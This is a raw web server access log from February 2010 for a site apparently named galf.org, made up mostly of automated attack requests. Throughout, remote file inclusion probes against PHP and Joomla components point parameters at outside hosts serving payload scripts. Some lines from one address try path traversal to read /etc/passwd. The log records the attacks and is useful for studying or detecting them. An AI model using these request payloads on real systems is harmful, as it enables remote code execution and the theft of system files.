211.43.212.56 - - [28/Feb/2010:16:01:39 -0800] "GET /logs/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:02:14 -0800] "GET /logs/access_091116.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:02:15 -0800] "GET /logs/access_091130.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:02:37 -0800] "GET /logs/access_091214.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:02:37 -0800] "GET /logs/access_100201.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:02:44 -0800] "GET /logs/access_090928.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:02:44 -0800] "GET /logs/access_100222.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:02:55 -0800] "GET /logs/access_100104.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:03:49 -0800] "GET /logs/access_100201.log//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:16:04:01 -0800] "GET /logs/access_091116.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
189.89.20.27 - - [28/Feb/2010:16:04:30 -0800] "GET /logs/access_091228.log%20%20/ HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:16:05:44 -0800] "GET /logs/access.log/index.php?sayfa=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:16:05:44 -0800] "GET /logs/access_100118.log/index.php?sayfa=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:07:35 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:07:35 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:07:35 -0800] "GET /logs/access_091012.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:07:43 -0800] "GET /logs/access_100104.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:07:44 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:07:56 -0800] "GET /logs/access_090907.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://etkbc.org/Images/Ba/id1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:07:56 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://etkbc.org/Images/Ba/id1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:07:56 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://etkbc.org/Images/Ba/id1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:18 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:18 -0800] "GET /logs/access_091130.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:18 -0800] "GET /logs/access_090921.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:18 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:31 -0800] "GET /logs/access_090817.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:31 -0800] "GET /logs/access_090907.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:31 -0800] "GET /logs/access_090803.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:36 -0800] "GET /logs/access_090921.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:36 -0800] "GET /logs/access_090810.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:40 -0800] "GET /logs/access_091130.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:40 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:40 -0800] "GET /logs/access_100104.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:40 -0800] "GET /logs/access_090831.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
76.76.23.105 - - [28/Feb/2010:16:08:40 -0800] "GET /logs/access_090928.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.62.74 - - [28/Feb/2010:16:10:06 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.62.74 - - [28/Feb/2010:16:10:06 -0800] "GET /logs/access_100104.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.62.74 - - [28/Feb/2010:16:10:06 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:12:05 -0800] "GET /logs/access_100201.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://etkbc.org/Images/Ba/id1.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
119.235.18.12 - - [28/Feb/2010:16:12:20 -0800] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
119.235.18.12 - - [28/Feb/2010:16:12:20 -0800] "GET /ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
119.235.18.12 - - [28/Feb/2010:16:12:20 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
119.235.18.12 - - [28/Feb/2010:16:12:43 -0800] "GET /logs/access_100222.log%20%20//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.18.12 - - [28/Feb/2010:16:12:43 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.18.12 - - [28/Feb/2010:16:12:44 -0800] "GET /ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:14:03 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.39.222 - - [28/Feb/2010:16:15:18 -0800] "GET /delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.39.222 - - [28/Feb/2010:16:15:18 -0800] "GET /logs/delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.39.222 - - [28/Feb/2010:16:15:18 -0800] "GET /logs/access_100201.log/delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:16:57 -0800] "GET /logs/access_100118.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.18.12 - - [28/Feb/2010:16:17:21 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
119.235.18.12 - - [28/Feb/2010:16:17:21 -0800] "GET /ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
119.235.18.12 - - [28/Feb/2010:16:17:21 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
119.235.18.12 - - [28/Feb/2010:16:17:39 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.18.12 - - [28/Feb/2010:16:17:42 -0800] "GET /logs/access_100222.log//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.18.12 - - [28/Feb/2010:16:17:42 -0800] "GET /ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:19:57 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:19:57 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:19:57 -0800] "GET /logs/access_100104.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:16:20:06 -0800] "GET /logs//administrator/components/com_users/users.class.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:16:20:06 -0800] "GET /administrator/components/com_users/users.class.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
219.240.39.222 - - [28/Feb/2010:16:20:33 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.39.222 - - [28/Feb/2010:16:20:33 -0800] "GET /delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.39.222 - - [28/Feb/2010:16:20:33 -0800] "GET /logs/delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.39.222 - - [28/Feb/2010:16:21:25 -0800] "GET /logs/access_100222.log/delete_all.php?board_skin_path=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.18.12 - - [28/Feb/2010:16:23:20 -0800] "GET /logs/access_100222.log//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:16:23:32 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.70.246 - - [28/Feb/2010:16:25:58 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:16:26:25 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:16:26:37 -0800] "GET /administrator/components/com_users/users.class.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:16:26:37 -0800] "GET /logs//administrator/components/com_users/users.class.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:16:28:41 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:29:09 -0800] "GET /logs/access.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:29:10 -0800] "GET /?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:29:10 -0800] "GET /logs/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:29:45 -0800] "GET /logs/access_091214.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:29:45 -0800] "GET /logs/access_091116.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:29:45 -0800] "GET /logs/access_091130.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:29:51 -0800] "GET /logs/access_100201.log//board/bbs/delete_all.php?board_skin_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.114.35 - - [28/Feb/2010:16:30:13 -0800] "GET /logs/access_090907.log HTTP/1.0" 200 3152962 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
222.122.25.99 - - [28/Feb/2010:16:30:17 -0800] "GET /QUIThttp://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
222.122.25.99 - - [28/Feb/2010:16:30:17 -0800] "GET /logs/QUIThttp://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:30:30 -0800] "GET /logs/access_100104.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:30:37 -0800] "GET /logs/access_090928.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:30:37 -0800] "GET /logs/access_091123.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:30:37 -0800] "GET /logs/access_100222.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:30:37 -0800] "GET /logs/access_100201.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:30:41 -0800] "GET /logs/access_100118.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:30:41 -0800] "GET /logs/access_090817.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:30:41 -0800] "GET /logs/access_090831.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:30:41 -0800] "GET /logs/access_091026.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:30:46 -0800] "GET /logs/access_091102.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [28/Feb/2010:16:30:54 -0800] "GET /logs/access_090921.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:30:55 -0800] "GET /logs/access_091116.log%20/index.php?arquivo=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:30:55 -0800] "GET /logs/access_091116.log%20/index.php?arquivo=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:30:55 -0800] "GET /logs/index.php?arquivo=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:30:56 -0800] "GET /logs/index.php?arquivo=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:30:56 -0800] "GET /index.php?arquivo=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:30:56 -0800] "GET /index.php?arquivo=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
119.235.18.12 - - [28/Feb/2010:16:31:33 -0800] "GET /logs/access_090831.log//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.18.12 - - [28/Feb/2010:16:31:33 -0800] "GET /ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.18.12 - - [28/Feb/2010:16:31:33 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:32:29 -0800] "GET /logs/access_100104.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:34:51 -0800] "GET /logs/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.0" 200 4926 "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:34:51 -0800] "GET /?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:34:51 -0800] "GET /logs/access.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:16:35:10 -0800] "GET /logs/access_100104.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:35:28 -0800] "GET /logs/access_091116.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:35:28 -0800] "GET /logs/access_091130.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:35:48 -0800] "GET /logs/access_091214.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:35:48 -0800] "GET /logs/access_100201.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:35:54 -0800] "GET /logs/access_090928.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:35:54 -0800] "GET /logs/access_100222.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:35:55 -0800] "GET /logs/access_100104.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.173.161.146 - - [28/Feb/2010:16:36:24 -0800] "GET /logs/access_100208.log//board/bbs/delete_all.php?board_skin_path=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.43.212.56 - - [28/Feb/2010:16:36:27 -0800] "GET /logs/access_091123.log%20%20/?myPath=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:37:05 -0800] "GET /logs/access_100208.log%20/index.php?arquivo=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:16:37:06 -0800] "GET /logs/access_100208.log%20/index.php?arquivo=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:16:37:23 -0800] "GET /logs/access_091221.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:16:37:23 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:16:37:23 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.18.12 - - [28/Feb/2010:16:37:37 -0800] "GET /logs/access_090831.log//ashnews.php?pathtoashnews=http://www.usher.co.kr/data/id/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.232.66.11 - - [28/Feb/2010:16:38:05 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.232.66.11 - - [28/Feb/2010:16:38:05 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:16:41:17 -0800] "GET /logs/access_090921.log/?sourcedir=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:16:41:17 -0800] "GET /?sourcedir=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:16:41:17 -0800] "GET /logs/?sourcedir=http://203.157.114.10/homepage/hinso//mambots/editors/sc1?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
